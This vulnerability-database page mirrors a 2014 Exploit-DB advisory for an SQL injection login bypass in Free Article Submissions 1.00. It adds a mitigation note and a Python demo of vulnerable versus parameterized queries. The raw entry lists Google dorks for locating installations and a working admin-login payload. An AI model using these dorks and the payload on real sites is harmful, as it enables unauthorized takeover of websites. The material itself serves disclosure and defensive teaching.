Vendor: Free Article Submissions
By: BarrabravaZ
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Free Article Submissions
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2014

Free Article Submissions SQL Injection Vulnerability

A remote attacker can log in to the website with administrator privileges and thereby manage the site.

Mitigation:

Validate and sanitize all user-supplied input before it reaches the database to prevent SQL injection attacks.
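As an added illustration (not code from the advisory or from the vendor's application), a minimal Python/sqlite3 model of an admin login check: the string-concatenated query that the advisory's payload defeats, beside the parameterized form that the mitigation calls for. The table, credentials and the use of SQLite's `--` comment marker in place of MySQL's `#` are assumptions made for the demo.

```python
import sqlite3

# Constructed in-memory stand-in for the application's admin table.
# Assumption: the real schema and credentials are not given on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return db

def build_query_unsafe(username, password):
    # Vulnerable pattern: attacker-controlled text is pasted into the SQL.
    # With the advisory's username "' OR 1=1 #" the WHERE clause becomes
    # username = '' OR 1=1 and the rest is commented out (MySQL '#').
    return ("SELECT username FROM admin WHERE username = '%s' AND password = '%s'"
            % (username, password))

def login_unsafe(db, username, password):
    # Executes the concatenated query; returns the matched username or None.
    row = db.execute(build_query_unsafe(username, password)).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Hardened form: placeholders keep the input as data, never as SQL syntax,
    # so the payload is compared literally against the stored username.
    row = db.execute(
        "SELECT username FROM admin WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

def demonstrate():
    # SQLite does not treat '#' as a comment, so the demo uses the
    # equivalent '--' marker; the parameterized query is tried with both.
    db = make_db()
    return {
        "bypass_unsafe": login_unsafe(db, "' OR 1=1 --", "barrabravaz"),
        "bypass_safe_dashes": login_safe(db, "' OR 1=1 --", "barrabravaz"),
        "bypass_safe_hash": login_safe(db, "' OR 1=1 #", "barrabravaz"),
        "valid_safe": login_safe(db, "admin", "s3cret"),
        "wrong_unsafe": login_unsafe(db, "admin", "wrong"),
    }

if __name__ == "__main__":
    print(build_query_unsafe("' OR 1=1 #", "barrabravaz"))
    print(demonstrate())
```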

Exploit-DB raw data:

# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
               inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows

 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»          Author will not be responsible for any damage.          «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue: 
x SQL Injection Bypass Login
x 
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to log in to the website with admin access level.
x 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username :  ' OR 1=1 #
## Password :  barrabravaz
##
##
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx